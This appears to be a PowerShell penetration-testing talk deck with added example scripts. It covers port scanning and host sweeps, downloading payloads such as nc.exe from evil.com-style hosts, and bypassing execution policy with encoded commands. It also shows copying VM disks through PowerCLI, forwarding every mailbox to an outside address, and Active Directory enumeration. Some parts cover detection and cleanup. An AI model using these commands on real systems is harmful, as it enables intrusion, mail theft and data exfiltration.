Tim Medin
Counter Hack Challenges

Background
  Pen Tester – Internal, Perimeter, Web, Social, Telephony
  Corp Security – Financial Services
  Network Engineer – Higher Education
  Software Engineer – Manufacturing & Industrial
  Control Systems Engineer

Contributions
  Laudanum
  CommandLineKungFu.com
  Packetstan.com
  Other blogs
  Local DefCon and security groups
  CCDC – local universities
  Coolness of PowerShell
  Basics of PowerShell
  Quick Command Line Attacks
  Script Execution
  3rd Party CmdLets
Coolness of PowerShell
CMD is teh sUck!!1!
  Need upgrade, badly
  Nothing is standard
    Naming
    Switches
    Switch operators: dash v. slash
  Why would you want to parse anything? Are you too good for the For Loop!
Installed by default on Windows 7, Server 2008 R2, and later
Full integration with Microsoft server products: Exchange, SharePoint, Active Directory
Third-party apps too: VMware!
Full access to the .NET Framework
In short, FUN!
Basics of PowerShell
"CmdLets" are quite standard
PowerShell naming convention: names are Verb-Noun
  Verbs standardized by Microsoft
    ▪ Get vs. Read
    ▪ Find vs. Search
Common parameter names, built-in Help
Just like other shells, but... Objects!
We don't have to parse text!
Easily string together many commands
Easier to read: $_.Length vs cut -d' ' -f4
Don't have to know what the 4th item in the output is, as with cut or awk
Find files containing "blah"
  Get-ChildItem | Select-String blah -List
Find files containing "blah"...and delete them
  Get-ChildItem | Select-String blah -List | Remove-Item
Variables
  Prefixed with $
  Dot access properties and methods of an object
  $_  Current pipeline object; used in script blocks, filters (Where-Object), ForEach-Object, and switches
  $true  $false  $null
  See them all with: Get-ChildItem variable:
PowerShell        PowerShell Alias    CMD             *nix
Get-ChildItem     ls, gci, dir        dir             ls
Copy-Item         cp, copy, cpi       copy            cp
Move-Item         move, mv, mi        move            mv
Select-String     <none>              find, findstr   grep
Get-Help          man, help           help            man
Get-Content       cat, gc, type       type            cat
Easy! Aliases match CMD and Bash
ForEach-Object (alias %)
  Operates on each object passed down the pipeline
  Not to be confused with ForEach, a looping statement
  Get-ChildItem | ForEach-Object { "do something with " + $_.Name }
  ls | % { "do something with " + $_.Name }
Where-Object (alias ?)
  Used to filter objects passed down the pipeline
  Get-Process | ? { $_.Modules -like "*(rsaenh.dll)*" -and
                    $_.Modules -like "*(iphlpapi.dll)*" -and
                    $_.Modules -like "*(WININET.dll)*" }
  How it works: -like against the Modules collection filters the collection (each module's text form is
  "System.Diagnostics.ProcessModule (rsaenh.dll)"); a non-empty result counts as true, so -and chains it.
  Processes you can't open (System, protected ones) throw "Access is denied", but the pipeline carries on.
Out-*  Output to file, Host, Printer, ...
Export-CSV  Exports objects, with names and properties; Import-CSV can read it back in
Group-Object  Groups objects together based on properties
Sort-Object
Get-Member (alias gm)  Gets all the properties and methods of an object type
  Available properties and methods on files: ls | gm
Format-List (alias fl)  Outputs the properties of all the objects passed down the pipeline, only "default" properties
  Use * to see all the properties: ls | fl *
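An added example (mine, not from the deck) that strings the cmdlets above together: it redoes the Where-Object module check against object properties rather than the collection's text form, then groups, sorts and exports the result. The module names are the slide's own; the output file name is a placeholder.

```powershell
# Added example, not from the slides. Find processes that have loaded both the
# CryptoAPI RSA provider and WinINet (things that can talk HTTPS), using the
# ModuleName property rather than wildcard-matching the collection's ToString().
$wanted = 'rsaenh.dll', 'wininet.dll'

$hits = Get-Process | Where-Object {
    try {
        # .Modules throws "Access is denied" for System/protected processes;
        # the catch turns that into "not a hit" instead of a red error
        $loaded = $_.Modules | ForEach-Object { $_.ModuleName.ToLower() }
        # a hit only when every wanted module is in the loaded list
        # (@() so .Count exists even for a single match on PowerShell 2.0)
        @($wanted | Where-Object { $loaded -contains $_ }).Count -eq $wanted.Count
    } catch {
        $false
    }
}

# Group-Object + Sort-Object: instances per image name, busiest first
$hits | Group-Object Name | Sort-Object Count -Descending |
    Select-Object Count, Name | Format-Table -AutoSize

# Export-Csv keeps the property names as the header row, so Import-Csv
# hands you objects back, not text to cut/awk apart
$hits | Select-Object Id, Name, Path |
    Export-Csv -NoTypeInformation -Encoding ASCII proc-crypto-http.csv

# the same filter in the slide's one-liner style, for comparison
Get-Process | ? { $_.Modules -like "*(rsaenh.dll)*" -and $_.Modules -like "*(wininet.dll)*" } 2>$null
```

Run it from an elevated prompt if you want the service processes included; otherwise they simply fall into the catch branch.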
Get-Command
  Gets a list of commands (DUH!)
  With no parameters it lists everything
  -Noun <string>  -Verb <string>  -Module <string> (all cmdlets in a module, e.g. Exchange, VMware, etc.)
  Very useful for finding the cmdlet you need!
Get-Help
  Can use it on aliases too (e.g. ls, mv)
  Default output isn't really useful
  Useful switches: -Examples (-ex for short), -Full
Aliases, Parameters
Partial parameter names: you need only as much of the name as necessary to identify it uniquely
  ✗ ls -f    "f" matches both Filter & Force (ambiguous, so it errors)
  ✔ ls -fo   "fo" only matches Force
  ✔ ls -for  "for" only matches Force
Tab completion works for CmdLets AND PARAMETERS! Allows you to cycle through matching names
You complete me!
Quick Command Line Attacks
Port scan
PS C:\> 1..1024 | % { echo ((new-object Net.Sockets.TcpClient).Connect("10.1.1.14",$_)) "$_ is open" } 2>$null
25 is open

Pseudo code:
1..1024 | foreach-object { print (connection_attempt "port is open") }
Discard the error messages (2>$null)

The trick:
PS C:\> echo (1+1) (2+2)
2
4
PS C:\> echo (1/0) (2+2)
Attempt to divide by zero.      <- 2+2 is not output
If the first argument throws, echo never gets to the second one, so "is open" is printed only when Connect() succeeds.

Host sweep: which hosts answer on 445?
PS C:\> 1..255 | % { echo ((new-object Net.Sockets.TcpClient).Connect("10.1.1.$_",445)) "10.1.1.$_" } 2>$null
10.1.1.5
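The one-liners above block on each connect attempt, so a closed port costs about a second (RST) and a filtered one waits out the full TCP timeout. The following is an added example, written for this page and not from the deck, that wraps the same TcpClient trick in a function with a connect timeout and emits objects instead of strings. The target 10.1.1.14 and the 10.1.1.0/24 range are the slide's placeholders; the 200 ms timeout is my assumption, tune it for the network.

```powershell
# Added example, not from the slides: TcpClient scan with a connect timeout.
function Test-TcpPort {
    param(
        [string]$ComputerName,
        [int[]]$Port = (1..1024),
        [int]$TimeoutMs = 200      # assumption: fine for a LAN, raise it over a VPN
    )
    foreach ($p in $Port) {
        $client = New-Object Net.Sockets.TcpClient
        # BeginConnect returns at once; wait at most $TimeoutMs for the handshake
        $ar   = $client.BeginConnect($ComputerName, $p, $null, $null)
        $done = $ar.AsyncWaitHandle.WaitOne($TimeoutMs, $false)
        $open = $false
        if ($done) {
            # EndConnect throws on RST (closed port); no throw means SYN/ACK came back
            try { $client.EndConnect($ar); $open = $true } catch { }
        }
        $client.Close()
        if ($open) {
            # emit an object so the result can be filtered, sorted or exported downstream
            New-Object PSObject -Property @{ ComputerName = $ComputerName; Port = $p; Open = $true }
        }
    }
}

# Port scan of one host, first 1024 ports
Test-TcpPort -ComputerName '10.1.1.14' -Port (1..1024) | Select-Object ComputerName, Port

# Host sweep: which machines on 10.1.1.0/24 answer on 445 (SMB)
1..254 | ForEach-Object { Test-TcpPort -ComputerName "10.1.1.$_" -Port 445 } |
    Select-Object ComputerName, Port
```

Because the function returns objects, the sweep can be piped straight into Export-Csv or Group-Object, which is the point of the Objects! slide above.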
Access a text file like this (to stdout):
  (New-Object System.Net.WebClient).DownloadString("http://mysite.com/myevil.ps1")
To save it to a file:
  … | Out-File -Encoding ASCII myfile.ps1
What if we want to download an executable?
  (New-Object System.Net.WebClient).DownloadFile("http://mysite.com/nc.exe", "c:\nc.exe")
...but we can't drive PowerShell interactively through netcat: it wants a terminal
From Meterpreter, go BOOM
What about a script?
Script Execution
Default execution policy stops scripts: the default mode is "Restricted"
Change it to allow local, unsigned scripts with Set-ExecutionPolicy RemoteSigned
  ▪ Changing it requires admin permissions (for the default LocalMachine scope; -Scope CurrentUser or -Scope Process does not)
BUT...
Get-Help about_Execution_Policies
The execution policy is not a security system that restricts user actions. For example, users can easily circumvent a policy by typing the script contents at the command line when they cannot run a script. Instead, the execution policy helps users to set basic rules and prevents them from violating them unintentionally.
-Command is not a script file, so the execution policy never comes into it:

C:\temp> powershell -command ls

    Directory: C:\temp

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         3/22/2012   5:10 PM         14 file2
-a---         3/22/2012   5:10 PM         12 file3

C:\temp> powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://evil.com/nc.exe', 'nc.exe')"

C:\temp> powershell -command ls

    Directory: C:\temp

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         3/22/2012   5:10 PM         14 file2
-a---         3/22/2012   5:10 PM         12 file3
-a---         3/23/2012  12:10 PM      61440 nc.exe
Run a script without running a script: use -EncodedCommand
  DefCon 18 talk by Dave Kennedy (ReL1K) and Josh Kelley (Winfang)
  Windump: dump the SAM via PowerShell, but has problems
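An added example (mine, not the deck's or Kennedy and Kelley's code) of what -EncodedCommand actually takes, plus the decode step a defender uses on whatever turns up in a scheduled task or log. The script body is a stand-in; swap in your own .ps1. Note that the argument is base64 of UTF-16LE, not ASCII, which is the usual reason hand-rolled encodings fail.

```powershell
# Added example, not from the slides: build and run a -EncodedCommand.
# Stand-in script body (assumption); normally you'd read a real .ps1:
#   $script = [IO.File]::ReadAllText((Resolve-Path .\myevil.ps1))
$script = @'
Get-Process | Sort-Object WS -Descending | Select-Object -First 5 Name, Id, WS
'@

# powershell.exe expects base64 over the UTF-16LE ("Unicode") bytes of the text
$bytes   = [Text.Encoding]::Unicode.GetBytes($script)
$encoded = [Convert]::ToBase64String($bytes)

# -NoProfile keeps the user's profile script out of the picture;
# nothing here touches a .ps1 on disk, so the execution policy is not consulted
$cmdline = "powershell.exe -NoProfile -NonInteractive -EncodedCommand $encoded"
$cmdline                    # paste this into CMD, a scheduled task, psexec, ...

# or run it straight from this session
powershell.exe -NoProfile -NonInteractive -EncodedCommand $encoded

# The other well-known route: per-process policy override, no admin needed
#   powershell.exe -ExecutionPolicy Bypass -File .\myevil.ps1

# Defender's side: decode what you found. Same two steps in reverse.
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($encoded))
```

The decoded text is what you should be reading in incident response; a long -EncodedCommand or -ExecutionPolicy Bypass on a command line is itself a reasonable detection trigger.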
3rd Party CmdLets
VMware PowerCLI: interface to VMware vSphere
Extremely powerful!
Commands
  Connect-VIServer vc1 -User tm -Password pw
  Get-VM
  Get-VM | Stop-VM -Confirm:$false      <- Power off EVERYTHING
  DON'T RUN THIS!
I want data...data is on the servers...so get the whole server?
  $ds = Get-Datastore <datastore-name>
  New-PSDrive -Name MyDS -PSProvider VimDatastore -Root '\' -Location $ds
  Copy-DatastoreItem MyDS:\Fldr2\ -Destination C:\temp
Firewall-Shmirewall!
  Invoke-VMScript runs a PowerShell script IN the guest OS of each of the specified virtual machines
  (it goes through VMware Tools, not the network, so the guest firewall never sees it)
  It does require credentials to access the guest
  We can probably get those when we download the VM
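An added example, not from the deck, putting the PowerCLI pieces above in order: find which datastore holds a VM's disks, mount it as a drive, copy the VM's folder out, then run a command inside another guest. vc1, the VM name FILESRV01, C:\temp and the guest credentials are placeholders; the assumption that the VM's datastore folder is named after the VM holds for the default layout but not always.

```powershell
# Added example, not from the slides. Requires the PowerCLI snap-in/module.
Connect-VIServer vc1 -User tm -Password pw

# Which datastore(s) hold the target's disks? (names are placeholders)
$vm = Get-VM 'FILESRV01'
$vm | Get-Datastore | Select-Object Name, FreeSpaceMB, CapacityMB

# Mount the first of them as a PSDrive and list the VM's folder
$ds = $vm | Get-Datastore | Select-Object -First 1
New-PSDrive -Name MyDS -PSProvider VimDatastore -Root '\' -Location $ds | Out-Null
Get-ChildItem "MyDS:\$($vm.Name)"          # .vmx, .vmdk, .nvram, logs ... (folder = VM name is an assumption)

# Pull the whole folder down; a .vmdk is the disk, so this is "the whole server"
Copy-DatastoreItem -Item "MyDS:\$($vm.Name)\" -Destination "C:\temp\$($vm.Name)" -Recurse

# Run a script inside a guest via VMware Tools; needs guest creds, ignores the guest firewall
Invoke-VMScript -VM $vm -ScriptType PowerShell -ScriptText 'whoami; ipconfig /all' `
    -GuestUser 'Administrator' -GuestPassword 'pw'

Disconnect-VIServer -Confirm:$false
```

The disk copy is large and noisy on the datastore network, so in practice you would target a single .vmdk rather than the folder; the structure of the commands is the same.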
Exchange
Why yes, I'd like all your email
  Set-Mailbox joeuser -DeliverToMailboxAndForward:$True -ForwardingAddress [email protected]
Why yes, I'd like EVERYONE'S email
  Get-Mailbox | Set-Mailbox -DeliverToMailboxAndForward:$True -ForwardingAddress [email protected]
  (Get-Mailbox returns at most 1000 mailboxes by default; add -ResultSize Unlimited to really get everyone)
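The forwarding trick leaves a visible setting on every mailbox it touches. As an added example, not from the deck, here is the audit a defender (or a tester checking for someone who got there first) runs from the Exchange Management Shell, plus the inverse of the attacker's command. The mailbox name joeuser is the slide's placeholder; the CSV file name is mine. ForwardingSmtpAddress (forwarding to an external address, Exchange 2010 SP1 and later) is checked alongside ForwardingAddress because either one exfiltrates mail.

```powershell
# Added example, not from the slides: find every mailbox that forwards somewhere.
$forwarders = Get-Mailbox -ResultSize Unlimited |
    Where-Object { $_.ForwardingAddress -ne $null -or $_.ForwardingSmtpAddress -ne $null } |
    Select-Object Name, Alias, ForwardingAddress, ForwardingSmtpAddress, DeliverToMailboxAndForward

$forwarders | Format-Table -AutoSize
$forwarders | Export-Csv -NoTypeInformation forwarding-audit.csv

# Who set it? Admin audit logging (Exchange 2010+) records the Set-Mailbox call
# with its parameters, if it is enabled on the org.
Search-AdminAuditLog -Cmdlets Set-Mailbox -Parameters ForwardingAddress, ForwardingSmtpAddress |
    Select-Object RunDate, Caller, ObjectModified

# Undo it for one mailbox: the inverse of the attacker's Set-Mailbox
Set-Mailbox joeuser -ForwardingAddress $null -ForwardingSmtpAddress $null -DeliverToMailboxAndForward:$false
```

Forwarding is also the first thing to check after any mailbox compromise, since it survives a password reset.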
Requires Domain Admin permissions

Active Directory
Providers
  Microsoft - requires one of the following
    ▪ Windows 2008 R2 Domain Controller
    ▪ Windows 2008 R2 Server running Lightweight Directory Services
  Quest - client only (better for pen testing)
List all users in a pretty CSV
  Get-ADUser -Filter * | Export-CSV us.csv     <- MS (Get-ADUser insists on -Filter or -Identity)
  Get-QADUser | Export-CSV us.csv              <- Quest
All users without password expirations
  Get-QADUser -Enabled -PasswordNeverExpires:$true
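An added example, not from the deck, giving the Microsoft ActiveDirectory module equivalents of the Quest queries above and the two or three other enumeration queries a tester runs right after them. It assumes the module is available (a 2008 R2 DC or ADWS, as the slide says) and that the account running it can read the directory; the CSV name is mine.

```powershell
# Added example, not from the slides: AD enumeration with the Microsoft module.
Import-Module ActiveDirectory

# All users to CSV. -Properties * because the default view returns only a
# handful of attributes; drop it for speed on a big domain.
Get-ADUser -Filter * -Properties * | Export-Csv -NoTypeInformation us.csv

# Enabled accounts whose password never expires (the Quest query, MS style)
Get-ADUser -Filter { Enabled -eq $true -and PasswordNeverExpires -eq $true } `
    -Properties PasswordNeverExpires |
    Select-Object SamAccountName, Name, DistinguishedName

# Who is really a Domain Admin, including nested groups
Get-ADGroupMember 'Domain Admins' -Recursive | Select-Object SamAccountName, objectClass

# User accounts with a Service Principal Name: service accounts, usually with
# old passwords and often with more privilege than they need
Get-ADUser -Filter { ServicePrincipalName -like '*' } -Properties ServicePrincipalName |
    Select-Object SamAccountName, ServicePrincipalName

# Accounts that have not logged on in 90 days but are still enabled (assumed threshold)
$cutoff = (Get-Date).AddDays(-90)
Get-ADUser -Filter { Enabled -eq $true -and LastLogonDate -lt $cutoff } -Properties LastLogonDate |
    Select-Object SamAccountName, LastLogonDate
```

Every query returns objects, so any of them can be piped to Export-Csv exactly like the first one.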
Summary
PowerShell is a significant upgrade from CMD
We can use the same CMD Fu, but it's easier (albeit more verbose)
Lots of interaction with other products
@timmedin
SEC 560: Network Penetration Testing and Ethical Hacking – Dallas, June 18 – 23
SEC 504: Hacker Techniques, Exploits and Incident Handling – Raleigh, July 16 – 21
References
  Brute-force VMware creds: http://blog.securitywhole.com/2009/09/01/brute-force-esx-usernamepassword.aspx
  PowerShell, it's time to own: http://www.secmaniac.com/files/PowerShell_Defcon.pdf
  Command Line Kung Fu blog: http://www.commandlinekungfu.com
  Hey! Scripting Guy!: http://blogs.technet.com/b/heyscriptingguy